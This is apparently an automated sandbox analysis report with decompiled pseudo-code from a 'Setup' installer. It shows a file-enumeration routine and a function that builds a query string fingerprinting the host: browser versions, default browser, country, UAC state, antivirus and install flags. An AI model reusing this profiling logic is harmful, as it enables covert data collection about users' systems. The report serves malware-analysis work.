				_v60 = E0041C5A0(_a4 + 4, 0x5c, 0xffffffff);
				if(_v60 >= 0) {
					__eflags = _a4 + 4;
					_v828 = E00405260(_a4 + 4,  &_v756, 0, _v60 + 1);
					_v832 = _v828;
					_v8 = 3;
					E00409880( &_v52, __eflags, _v832);
					_v8 = 1;
					E004178C0( &_v756);
				} else {
					E00417910(0x52d34c, E00434050( &_v725));
					_v8 = 2;
					E004181D0( &_v52,  &_v724);
					_v8 = 1;
					E004176E0();
				}
				_t97 = FindFirstFileW(E00416A30(_a4 + 4),  &_v688); // executed
				_v96 = _t97;
				_v53 = 1;
				while((_v53 & 0x000000ff) == 1 && _v96 != 0xffffffff) {
					_v836 = E00417910( &(_v688.cFileName), E00434050( &_v789));
					_v840 = _v836;
					_v8 = 4;
					_v844 = _v840;
					if(_v844 == 0) {
						_v848 = 0;
					} else {
						_v848 = _v844 + 4;
					}
					_t182 =  &_v52;
					if( &_v52 == 0) {
						_v852 = 0;
					} else {
						_v852 =  &_v52 + 4;
					}
					_t110 = E00409960( &_v820, _v852, _v848);
					_t177 = _t177 + 0xc;
					_v856 = _t110;
					_v860 = _v856;
					_v8 = 5;
					_t171 = _v860;
					E00409880( &_v92, _t182, _t171);
					_v8 = 4;
					E004178C0( &_v820);
					_v8 = 1;
					E004176E0();
					E00425AB0(_a8, _t182,  &_v92);
					_v53 = _t171 & 0xffffff00 | FindNextFileW(_v96,  &_v688) != 0x00000000;
				}
				FindClose(_v96); // executed
				_t100 = E00447780(_a8);
				__eflags = 0 - _t100;
				asm("sbb eax, eax");
				_v821 =  ~_t100;
				_v8 = 0;
				E004176E0();
				_v8 = 0xffffffff;
				E004176E0();
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t175;
				return E0044F6C8(_v821, _t125, _v20 ^ _t175, 0, _t173, _t174);
			}










































                                                                                                                                                              0x0049f0e0
                                                                                                                                                              0x0049f0e0
                                                                                                                                                              0x0049f0e0
                                                                                                                                                              0x0049f0e3
                                                                                                                                                              0x0049f0e5
                                                                                                                                                              0x0049f0f0
                                                                                                                                                              0x0049f0f1
                                                                                                                                                              0x0049f0f7
                                                                                                                                                              0x0049f0fc
                                                                                                                                                              0x0049f0fe
                                                                                                                                                              0x0049f101
                                                                                                                                                              0x0049f105
                                                                                                                                                              0x0049f11a
                                                                                                                                                              0x0049f11f
                                                                                                                                                              0x0049f135
                                                                                                                                                              0x0049f13a
                                                                                                                                                              0x0049f14d
                                                                                                                                                              0x0049f154
                                                                                                                                                              0x0049f1a9
                                                                                                                                                              0x0049f1b1
                                                                                                                                                              0x0049f1bd
                                                                                                                                                              0x0049f1c3
                                                                                                                                                              0x0049f1d1
                                                                                                                                                              0x0049f1d6
                                                                                                                                                              0x0049f1e0
                                                                                                                                                              0x0049f156
                                                                                                                                                              0x0049f16d
                                                                                                                                                              0x0049f172
                                                                                                                                                              0x0049f180
                                                                                                                                                              0x0049f185
                                                                                                                                                              0x0049f18f
                                                                                                                                                              0x0049f18f
                                                                                                                                                              0x0049f1f8
                                                                                                                                                              0x0049f1fe
                                                                                                                                                              0x0049f201
                                                                                                                                                              0x0049f220
                                                                                                                                                              0x0049f255
                                                                                                                                                              0x0049f261
                                                                                                                                                              0x0049f267
                                                                                                                                                              0x0049f271
                                                                                                                                                              0x0049f27e
                                                                                                                                                              0x0049f291
                                                                                                                                                              0x0049f280
                                                                                                                                                              0x0049f289
                                                                                                                                                              0x0049f289
                                                                                                                                                              0x0049f29e
                                                                                                                                                              0x0049f2a0
                                                                                                                                                              0x0049f2b0
                                                                                                                                                              0x0049f2a2
                                                                                                                                                              0x0049f2a8
                                                                                                                                                              0x0049f2a8
                                                                                                                                                              0x0049f2cf
                                                                                                                                                              0x0049f2d4
                                                                                                                                                              0x0049f2d7
                                                                                                                                                              0x0049f2e3
                                                                                                                                                              0x0049f2e9
                                                                                                                                                              0x0049f2ed
                                                                                                                                                              0x0049f2f7
                                                                                                                                                              0x0049f2fc
                                                                                                                                                              0x0049f306
                                                                                                                                                              0x0049f30b
                                                                                                                                                              0x0049f315
                                                                                                                                                              0x0049f321
                                                                                                                                                              0x0049f21d
                                                                                                                                                              0x0049f21d
                                                                                                                                                              0x0049f32f
                                                                                                                                                              0x0049f338
                                                                                                                                                              0x0049f33f
                                                                                                                                                              0x0049f341
                                                                                                                                                              0x0049f345
                                                                                                                                                              0x0049f34b
                                                                                                                                                              0x0049f352
                                                                                                                                                              0x0049f357
                                                                                                                                                              0x0049f361
                                                                                                                                                              0x0049f36f
                                                                                                                                                              0x0049f37a
                                                                                                                                                              0x0049f384

                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000,-00000001,0000005C,000000FF,00000000,00000000,DDD124F9), ref: 0049F1F8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                              • Opcode ID: a26dd83c163b041f37544551c5816758a5a807a1d5133d7aca4cc513257ce788
                                                                                                                                                              • Instruction ID: cc1ef078bf7205146ab4a592bcf7a98bcf4aa0962d6995632bada8dfdccf46d9
                                                                                                                                                              • Opcode Fuzzy Hash: a26dd83c163b041f37544551c5816758a5a807a1d5133d7aca4cc513257ce788
                                                                                                                                                              • Instruction Fuzzy Hash: 03716D70914258DFDB19DBA5CC94BEDBBB8AF14304F1441EEE00AA7291DB382B88CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004DFFD0 Relevance: 51.6, APIs: 5, Strings: 24, Instructions: 823COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 4dffd0-4e0043 call 434050 call 4175c0 call 434050 call 4175c0 call 4d6610 11 4e0045-4e0051 0->11 12 4e0053 0->12 13 4e005d-4e00f6 call 409760 call 409880 call 4178c0 call 4fdb00 call 4181d0 call 4176e0 call 416630 11->13 12->13 28 4e00f8-4e00fd 13->28 29 4e0166-4e01a2 call 4228a0 call 483530 13->29 31 4e00ff-4e010b 28->31 32 4e010d 28->32 39 4e01a4-4e01b3 29->39 40 4e01b5 29->40 34 4e0117-4e0161 call 409760 call 405120 call 4178c0 31->34 32->34 34->29 42 4e01bf-4e0262 call 409760 call 405120 call 4178c0 call 4176e0 call 434050 call 417910 39->42 40->42 57 4e0264-4e0273 42->57 58 4e0275 42->58 59 4e027f-4e0300 call 4f4dc0 call 4098d0 call 405120 call 4178c0 call 4176e0 call 49d9c0 * 2 call 496160 57->59 58->59 76 4e0306-4e034b call 434050 call 417910 59->76 77 4e03d1-4e04d0 call 434050 call 417910 call 501ce0 call 501530 call 490220 call 490d50 call 404760 call 4dcb20 call 4d4bc0 call 416a30 call 48cc50 call 484ea0 call 47f670 call 416600 call 4176e0 call 4224b0 call 4176e0 59->77 86 4e035e 76->86 87 4e034d-4e035c 76->87 128 4e04d2-4e04de 77->128 129 4e04e0 77->129 89 4e0368-4e03cc call 416a30 PathFindFileNameW call 4098d0 call 405120 call 4178c0 call 4176e0 86->89 87->89 89->77 130 4e04ea-4e0531 call 405120 call 482b50 128->130 129->130 135 4e0544 130->135 136 4e0533-4e0542 130->136 137 4e054e-4e0586 call 483160 135->137 136->137 140 4e0588-4e0597 137->140 141 4e0599 137->141 142 4e05a3-4e06c2 call 409760 call 4098d0 call 409960 call 405120 call 4178c0 * 3 call 4176e0 * 2 call 4160e0 call 416630 140->142 141->142 166 4e06c4-4e06c9 142->166 167 4e0732-4e0786 call 494af0 call 404820 call 423be0 call 404820 call 4d4c10 call 416600 142->167 168 4e06cb-4e06d7 166->168 169 4e06d9 166->169 188 4e0788-4e0794 167->188 189 4e0796 167->189 171 4e06e3-4e072d call 409760 call 405120 call 4178c0 168->171 169->171 171->167 190 4e07a0-4e07ff call 405120 call 4956b0 call 4181d0 call 4176e0 call 416630 188->190 189->190 201 4e0888-4e08c0 call 4d7b30 190->201 202 4e0805-4e081f call 416a30 call 4a0280 190->202 207 4e08c2-4e08d1 201->207 208 4e08d3 201->208 213 4e082f 202->213 214 4e0821-4e082d 202->214 210 4e08dd-4e0909 call 405120 call 4176e0 call 4d2f80 207->210 208->210 226 4e090b-4e0910 210->226 227 4e0979-4e0982 210->227 216 4e0839-4e0883 call 409760 call 405120 call 4178c0 213->216 214->216 216->201 230 4e0912-4e091e 226->230 231 4e0920 226->231 228 4e0984-4e098c call 4130d0 227->228 229 4e0991-4e09a6 call 4cb910 227->229 228->229 238 4e09a8-4e09b0 call 4130d0 229->238 239 4e09b5-4e09bf call 494a70 229->239 232 4e092a-4e0974 call 409760 call 405120 call 4178c0 230->232 231->232 232->227 238->239 245 4e09ce-4e09e3 call 4cb910 239->245 246 4e09c1-4e09c9 call 4130d0 239->246 251 4e09e5-4e09ed call 4130d0 245->251 252 4e09f2-4e0a05 call 502490 245->252 246->245 251->252 256 4e0a07-4e0a13 252->256 257 4e0a15 252->257 258 4e0a1f-4e0aa6 call 409760 call 405120 call 4178c0 call 4df870 256->258 257->258 267 4e0aa8-4e0ab7 258->267 268 4e0ab9 258->268 269 4e0ac3-4e0aeb call 405120 call 4176e0 call 4953b0 267->269 268->269 276 4e0aed-4e0af7 269->276 277 4e0af9 269->277 278 4e0b03-4e0b19 call 4130d0 276->278 277->278 281 4e0b2b 278->281 282 4e0b1b-4e0b29 278->282 283 4e0b35-4e0b8e call 409760 call 405120 call 4178c0 call 503f30 281->283 282->283 292 4e0c02-4e0c0c call 423810 283->292 293 4e0b90-4e0b97 283->293 300 4e0c0e-4e0c23 call 4240a0 call 4130a0 * 2 292->300 301 4e0c28-4e0c3e call 4e7a30 call 4e7a50 292->301 294 4e0ba9 293->294 295 4e0b99-4e0ba7 293->295 297 4e0bb3-4e0bfd call 409760 call 405120 call 4178c0 294->297 295->297 297->292 300->301 311 4e0c43-4e0c6c 301->311 315 4e0c6e-4e0c7d 311->315 316 4e0c7f 311->316 317 4e0c89-4e0d41 call 409760 call 405120 call 4178c0 call 4176e0 call 417660 call 4e7a10 call 4176e0 * 2 call 44f6c8 315->317 316->317
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004DFFD0(void* __ebx, void* __edi, void* __esi, char _a4) {
				char _v8;
				char _v16;
				char _v20;
				signed int _v24;
				char _v52;
				char _v56;
				char _v84;
				char _v88;
				char _v89;
				char _v90;
				char _v120;
				char _v152;
				char _v180;
				char _v212;
				char _v240;
				void* _v272;
				char _v273;
				char _v304;
				void* _v336;
				char _v337;
				char _v368;
				char _v400;
				char _v401;
				char _v448;
				char _v480;
				char _v512;
				char _v544;
				char _v572;
				char _v600;
				char _v628;
				char _v656;
				char _v688;
				char _v716;
				char _v748;
				char _v776;
				char _v804;
				char _v836;
				char _v864;
				char _v892;
				char _v924;
				char _v952;
				signed int _v956;
				char _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				char _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				char _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				char _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				char _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				char _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				char _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				char _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				char _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				char _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				char _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				char _v1188;
				char _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				char _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				char _v1228;
				char* _v1232;
				char _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				char _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				char _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				signed int _t387;
				signed int _t388;
				intOrPtr _t401;
				void* _t406;
				intOrPtr _t407;
				intOrPtr _t410;
				void* _t417;
				void* _t423;
				void* _t424;
				void* _t425;
				intOrPtr _t432;
				void* _t438;
				intOrPtr _t447;
				intOrPtr _t449;
				intOrPtr _t456;
				intOrPtr* _t464;
				intOrPtr _t475;
				intOrPtr _t478;
				signed char _t482;
				intOrPtr _t483;
				void* _t488;
				intOrPtr _t500;
				signed char _t503;
				intOrPtr _t507;
				signed char _t512;
				intOrPtr _t515;
				void* _t531;
				intOrPtr _t534;
				intOrPtr _t547;
				intOrPtr _t555;
				intOrPtr _t561;
				intOrPtr _t573;
				intOrPtr _t580;
				void* _t586;
				intOrPtr _t646;
				intOrPtr _t747;
				intOrPtr _t748;
				void* _t790;
				void* _t791;
				signed int _t792;
				void* _t793;
				void* _t795;
				void* _t797;
				void* _t798;
				void* _t802;
				void* _t805;
				void* _t806;
				void* _t807;
				void* _t810;
				void* _t811;
				void* _t812;
				void* _t813;
				void* _t814;
				void* _t815;
				void* _t817;
				void* _t818;
				void* _t820;

				_t791 = __esi;
				_t790 = __edi;
				_t586 = __ebx;
				_push(0xffffffff);
				_push(0x51279e);
				_push( *[fs:0x0]);
				_t387 =  *0x561244; // 0xddd124f9
				_t388 = _t387 ^ _t792;
				_v24 = _t388;
				_push(_t388);
				 *[fs:0x0] =  &_v16;
				_v956 = 0;
				E004175C0(E00434050( &_v89));
				_v8 = 1;
				E004175C0(E00434050( &_v90));
				_v8 = 2;
				E004D6610( &_v56);
				_t795 = _t793 - 0x4f0 + 4;
				_t821 =  &_v56;
				if( &_v56 == 0) {
					_v960 = 0;
				} else {
					_v960 =  &_v56 + 4;
				}
				_v964 = E00409760( &_v120, L"ver=", _v960);
				_v968 = _v964;
				_v8 = 3;
				E00409880( &_v88, _t821, _v968);
				_v8 = 2;
				E004178C0( &_v120);
				_t401 = E004FDB00(_t586, _t790, _t791, _t821,  &_v152);
				_t797 = _t795 + 0x10;
				_v972 = _t401;
				_v976 = _v972;
				_v8 = 4;
				E004181D0( &_v56, _v976);
				_v8 = 2;
				E004176E0();
				if((E00416630( &_v52) & 0x000000ff) == 0) {
					_t823 =  &_v56;
					if( &_v56 == 0) {
						_v980 = 0;
					} else {
						_v980 =  &_v56 + 4;
					}
					_t580 = E00409760( &_v180, "&", _v980);
					_t797 = _t797 + 0xc;
					_v984 = _t580;
					_v988 = _v984;
					_v8 = 5;
					E00405120( &_v84, _v988);
					_v8 = 2;
					E004178C0( &_v180);
				}
				_t406 = E004228A0(); // executed
				_t407 = E00483530(_t586, _t406, _t790, _t791, _t823,  &_v212); // executed
				_v992 = _t407;
				_v996 = _v992;
				_v8 = 6;
				_v1000 = _v996;
				if(_v1000 == 0) {
					_v1004 = 0;
				} else {
					_v1004 = _v1000 + 4;
				}
				_t410 = E00409760( &_v240, L"&mntrId=", _v1004);
				_t798 = _t797 + 0xc;
				_v1008 = _t410;
				_v1012 = _v1008;
				_v8 = 7;
				E00405120( &_v84, _v1012);
				_v8 = 6;
				E004178C0( &_v240);
				_v8 = 2;
				E004176E0();
				_v1016 = E00417910(L"&moldid=", E00434050( &_v273));
				_v1020 = _v1016;
				_v8 = 8;
				_v1024 = _v1020;
				_t825 = _v1024;
				if(_v1024 == 0) {
					_v1028 = 0;
				} else {
					_v1028 = _v1024 + 4;
				}
				_t417 = E004F4DC0(_t586, _t790, _t791); // executed
				_v1032 = E004098D0( &_v304, _v1028, _t417);
				_v1036 = _v1032;
				_v8 = 9;
				E00405120( &_v84, _v1036);
				_v8 = 8;
				E004178C0( &_v304);
				_v8 = 2;
				E004176E0();
				_t423 = E0049D9C0( &_v56, 0); // executed
				_t424 = E0049D9C0( &_v56, _t423); // executed
				_t425 = E00496160(_t586, _t790, _t791, _t825, _t424,  &_v56); // executed
				_t802 = _t798 + 0x1c;
				if(_t425 != 0) {
					_v1040 = E00417910(L"&sufn=", E00434050( &_v337));
					_v1044 = _v1040;
					_v8 = 0xa;
					_v1048 = _v1044;
					_t827 = _v1048;
					if(_v1048 == 0) {
						_v1052 = 0;
					} else {
						_v1052 = _v1048 + 4;
					}
					_t573 = E004098D0( &_v368, _v1052, PathFindFileNameW(E00416A30( &_v52)));
					_t802 = _t802 + 0xc;
					_v1056 = _t573;
					_v1060 = _v1056;
					_v8 = 0xb;
					E00405120( &_v84, _v1060);
					_v8 = 0xa;
					E004178C0( &_v368);
					_v8 = 2;
					E004176E0();
				}
				E00417910(L"WBR", E00434050( &_v401));
				_v8 = 0xc;
				_v1064 = E00501530(E00501CE0(), _t827,  &_v448,  &_v400);
				_v1068 = _v1064;
				_v8 = 0xd;
				_t432 = E00490D50(_t586, E00490220(), _t790, _t791, _t827,  &_v480); // executed
				_v1072 = _t432;
				_v1076 = _v1072;
				_v8 = 0xe;
				_push(E00404760(_v1068, 7));
				_push(E004D4BC0(E004DCB20(_t586, _t790, _t791, _t827)));
				_push(E00416A30(_v1076 + 4));
				_push(E0048CC50(_t586, _t790, _t791)); // executed
				_t438 = E00484EA0(_t586, _t790, _t791); // executed
				_push(_t438);
				E00416600(_v1076 + 4,  &_v56, L"&iev=%d&ffv=%d&crv=%d&dwb=%s&dlb=%s&wbr=%d", E0047F670(_t586, _t790, _t791, 0));
				_t805 = _t802 + 0x28;
				_v8 = 0xd;
				E004176E0();
				_v8 = 0xc;
				E004224B0();
				_v8 = 2;
				E004176E0();
				_t828 =  &_v56;
				if( &_v56 == 0) {
					_v1080 = 0;
				} else {
					_v1080 =  &_v56 + 4;
				}
				E00405120( &_v84, _v1080);
				_t447 = E00482B50(_t586, _t790, _t791, _t828,  &_v512); // executed
				_t806 = _t805 + 4;
				_v1084 = _t447;
				_v1088 = _v1084;
				_v8 = 0xf;
				_v1092 = _v1088;
				_t829 = _v1092;
				if(_v1092 == 0) {
					_v1096 = 0;
				} else {
					_v1096 = _v1092 + 4;
				}
				_t449 = E00483160(_t586,  &_v544, _t790, _t791, _t829,  &_v544); // executed
				_t807 = _t806 + 4;
				_v1100 = _t449;
				_v1104 = _v1100;
				_v8 = 0x10;
				_v1108 = _v1104;
				if(_v1108 == 0) {
					_v1112 = 0;
				} else {
					_v1112 = _v1108 + 4;
				}
				_v1116 = E00409760( &_v572, L"&ibprs=", _v1112);
				_v1120 = _v1116;
				_v8 = 0x11;
				_v1124 = E004098D0( &_v600, _v1120, L"&ibprv=");
				_v1128 = _v1124;
				_v8 = 0x12;
				_t456 = E00409960( &_v628, _v1128, _v1096);
				_t810 = _t807 + 0x24;
				_v1132 = _t456;
				_v1136 = _v1132;
				_v8 = 0x13;
				E00405120( &_v84, _v1136);
				_v8 = 0x12;
				E004178C0( &_v628);
				_v8 = 0x11;
				E004178C0( &_v600);
				_v8 = 0x10;
				E004178C0( &_v572);
				_v8 = 0xf;
				E004176E0();
				_v8 = 2;
				E004176E0();
				_t464 =  *0x5bde00; // 0x23a9ef8
				E004160E0( *((intOrPtr*)( *((intOrPtr*)( *_t464 + 0x2c))))( &_v56, 1), 0xe, 0xe);
				if((E00416630( &_v52) & 0x000000ff) == 0) {
					if( &_v56 == 0) {
						_v1140 = 0;
					} else {
						_v1140 =  &_v56 + 4;
					}
					_t561 = E00409760( &_v656, L"&test=", _v1140);
					_t810 = _t810 + 0xc;
					_v1144 = _t561;
					_v1148 = _v1144;
					_v8 = 0x14;
					E00405120( &_v84, _v1148);
					_v8 = 2;
					E004178C0( &_v656);
				}
				_push(E00494AF0());
				_t747 =  *0x5bdd3c; // 0xff676980
				_push(_t747);
				_push(E00423BE0(E00404820()) & 0x0000ffff);
				_push(E004D4C10(E00404820()));
				_t646 =  *0x5be030; // 0x0
				_push(_t646);
				_t748 =  *0x5bdd2c; // 0x42
				_push(_t748);
				_t475 =  *0x5bb6b8; // 0x32
				E00416600( &_v56,  &_v56, L"&sutp=%d&sufl=%d&tbp=%d&prver=%d&minreq=%d&dtct=%d&wvr=%d", _t475);
				_t811 = _t810 + 0x24;
				if( &_v56 == 0) {
					_v1152 = 0;
				} else {
					_v1152 =  &_v56 + 4;
				}
				E00405120( &_v84, _v1152);
				_t478 = E004956B0(_t586,  &_v688, _t790, _t791,  &_v688); // executed
				_t812 = _t811 + 4;
				_v1156 = _t478;
				_v1160 = _v1156;
				_v8 = 0x15;
				E004181D0( &_v56, _v1160);
				_v8 = 2;
				E004176E0();
				_t482 = E00416630( &_v52);
				_t751 = _t482 & 0x000000ff;
				_t834 = _t482 & 0x000000ff;
				if((_t482 & 0x000000ff) == 0) {
					E004A0280(_t586, _t751, _t790, _t791, _t834, E00416A30( &_v52),  &_v56);
					_t820 = _t812 + 8;
					if( &_v56 == 0) {
						_v1164 = 0;
					} else {
						_v1164 =  &_v56 + 4;
					}
					_t555 = E00409760( &_v716, L"&avr=", _v1164);
					_t812 = _t820 + 0xc;
					_v1168 = _t555;
					_v1172 = _v1168;
					_v8 = 0x16;
					E00405120( &_v84, _v1172);
					_v8 = 2;
					E004178C0( &_v716);
				}
				_t483 = E004D7B30(_t586, _t790, _t791,  &_v748);
				_t813 = _t812 + 4;
				_v1176 = _t483;
				_v1180 = _v1176;
				_v8 = 0x17;
				_v1184 = _v1180;
				if(_v1184 == 0) {
					_v1188 = 0;
				} else {
					_v1188 = _v1184 + 4;
				}
				E00405120( &_v84, _v1188);
				_v8 = 2;
				E004176E0();
				_t488 = E004D2F80(_t586, _t790, _t791,  &_v56); // executed
				_t814 = _t813 + 4;
				if(_t488 > 0) {
					if( &_v56 == 0) {
						_v1192 = 0;
					} else {
						_v1192 =  &_v56 + 4;
					}
					_t547 = E00409760( &_v776, L"&tbtp=", _v1192);
					_t814 = _t814 + 0xc;
					_v1196 = _t547;
					_v1200 = _v1196;
					_v8 = 0x18;
					E00405120( &_v84, _v1200);
					_v8 = 2;
					E004178C0( &_v776);
				}
				if(( *0x5bdd29 & 0x000000ff) != 0) {
					E004130D0( &_v84, L"&tbinst=1");
				}
				if((E004CB910(0x5be390, 0xc, 0x52, 0) & 0x000000ff) != 0) {
					E004130D0( &_v84, L"&notc=1");
				}
				if((E00494A70(_t586, _t791) & 0x000000ff) != 0) {
					E004130D0( &_v84, L"&w64=1");
				}
				if((E004CB910(0x5be390, 0xc, 0x5a, 0) & 0x000000ff) != 0) {
					E004130D0( &_v84, L"&noupgrd=1");
				}
				E00502490(_t586, _t790, _t791,  &_v56, 0);
				_t815 = _t814 + 8;
				if( &_v56 == 0) {
					_v1204 = 0;
				} else {
					_v1204 =  &_v56 + 4;
				}
				_v1208 = E00409760( &_v804, L"&cntry=", _v1204);
				_v1212 = _v1208;
				_v8 = 0x19;
				E00405120( &_v84, _v1212);
				_v8 = 2;
				E004178C0( &_v804);
				_t500 = E004DF870(_t586, _t790, _t791,  &_v836);
				_t817 = _t815 + 0x10;
				_v1216 = _t500;
				_v1220 = _v1216;
				_v8 = 0x1a;
				_v1224 = _v1220;
				_t844 = _v1224;
				if(_v1224 == 0) {
					_v1228 = 0;
				} else {
					_v1228 = _v1224 + 4;
				}
				E00405120( &_v84, _v1228);
				_v8 = 2;
				E004176E0(); // executed
				_t503 = E004953B0(_t844); // executed
				if((_t503 & 0x000000ff) == 0) {
					_v1232 = L"&uac=0";
				} else {
					_v1232 = L"&uac=1";
				}
				_t320 =  &_v1232; // 0x536268
				E004130D0( &_v84,  *_t320);
				if(0x5be010 == 0) {
					_v1236 = 0;
				} else {
					_v1236 = 0x5be014;
				}
				_t507 = E00409760( &_v864, L"&osp=", _v1236);
				_t818 = _t817 + 0xc;
				_v1240 = _t507;
				_v1244 = _v1240;
				_v8 = 0x1b;
				E00405120( &_v84, _v1244);
				_v8 = 2;
				E004178C0( &_v864);
				if((E00503F30( &_v864, 0x5be010) & 0x000000ff) != 0) {
					if(0x5bded8 == 0) {
						_v1248 = 0;
					} else {
						_v1248 = 0x5bdedc;
					}
					_t534 = E00409760( &_v892, L"&gloss=", _v1248);
					_t818 = _t818 + 0xc;
					_v1252 = _t534;
					_v1256 = _v1252;
					_v8 = 0x1c;
					E00405120( &_v84, _v1256);
					_v8 = 2;
					E004178C0( &_v892);
				}
				_t512 = E00423810(0x5bded8);
				_t849 = _t512 & 0x000000ff;
				if((_t512 & 0x000000ff) != 0) {
					_t531 = E004240A0();
					E004130A0(_t586, E004130A0(_t586,  &_v84, _t790, _t791, L"&voices="), _t790, _t791, _t531);
				}
				E004E7A30( &_v20);
				_v8 = 0x1d;
				_t515 = E004E7A50(_t586,  &_v20, _t790, _t791, _t849,  &_v924); // executed
				_v1260 = _t515;
				_v1264 = _v1260;
				_v8 = 0x1e;
				_v1268 = _v1264;
				if(_v1268 == 0) {
					_v1272 = 0;
				} else {
					_v1272 = _v1268 + 4;
				}
				_v1276 = E00409760( &_v952, L"&dnt=", _v1272);
				_v1280 = _v1276;
				_v8 = 0x1f;
				E00405120( &_v84, _v1280);
				_v8 = 0x1e;
				E004178C0( &_v952);
				_v8 = 0x1d;
				E004176E0();
				E00417660(_a4,  &_v88);
				_v956 = _v956 | 0x00000001;
				_v8 = 2;
				E004E7A10( &_v20);
				_v8 = 1;
				E004176E0();
				_v8 = 0;
				E004176E0();
				_t383 =  &_a4; // 0x4e272f
				 *[fs:0x0] = _v16;
				return E0044F6C8( *_t383, _t586, _v24 ^ _t792,  &_v88, _t790, _t791);
			}























































































































































































                                                                                                                                                              0x004dffd0
                                                                                                                                                              0x004dffd0
                                                                                                                                                              0x004dffd0
                                                                                                                                                              0x004dffd3
                                                                                                                                                              0x004dffd5
                                                                                                                                                              0x004dffe0
                                                                                                                                                              0x004dffe7
                                                                                                                                                              0x004dffec
                                                                                                                                                              0x004dffee
                                                                                                                                                              0x004dfff1
                                                                                                                                                              0x004dfff5
                                                                                                                                                              0x004dfffb
                                                                                                                                                              0x004e0011
                                                                                                                                                              0x004e0016
                                                                                                                                                              0x004e0029
                                                                                                                                                              0x004e002e
                                                                                                                                                              0x004e0036
                                                                                                                                                              0x004e003b
                                                                                                                                                              0x004e0041
                                                                                                                                                              0x004e0043
                                                                                                                                                              0x004e0053
                                                                                                                                                              0x004e0045
                                                                                                                                                              0x004e004b
                                                                                                                                                              0x004e004b
                                                                                                                                                              0x004e0075
                                                                                                                                                              0x004e0081
                                                                                                                                                              0x004e0087
                                                                                                                                                              0x004e0095
                                                                                                                                                              0x004e009a
                                                                                                                                                              0x004e00a1
                                                                                                                                                              0x004e00ad
                                                                                                                                                              0x004e00b2
                                                                                                                                                              0x004e00b5
                                                                                                                                                              0x004e00c1
                                                                                                                                                              0x004e00c7
                                                                                                                                                              0x004e00d5
                                                                                                                                                              0x004e00da
                                                                                                                                                              0x004e00e4
                                                                                                                                                              0x004e00f6
                                                                                                                                                              0x004e00fb
                                                                                                                                                              0x004e00fd
                                                                                                                                                              0x004e010d
                                                                                                                                                              0x004e00ff
                                                                                                                                                              0x004e0105
                                                                                                                                                              0x004e0105
                                                                                                                                                              0x004e012a
                                                                                                                                                              0x004e012f
                                                                                                                                                              0x004e0132
                                                                                                                                                              0x004e013e
                                                                                                                                                              0x004e0144
                                                                                                                                                              0x004e0152
                                                                                                                                                              0x004e0157
                                                                                                                                                              0x004e0161
                                                                                                                                                              0x004e0161
                                                                                                                                                              0x004e016d
                                                                                                                                                              0x004e0174
                                                                                                                                                              0x004e0179
                                                                                                                                                              0x004e0185
                                                                                                                                                              0x004e018b
                                                                                                                                                              0x004e0195
                                                                                                                                                              0x004e01a2
                                                                                                                                                              0x004e01b5
                                                                                                                                                              0x004e01a4
                                                                                                                                                              0x004e01ad
                                                                                                                                                              0x004e01ad
                                                                                                                                                              0x004e01d2
                                                                                                                                                              0x004e01d7
                                                                                                                                                              0x004e01da
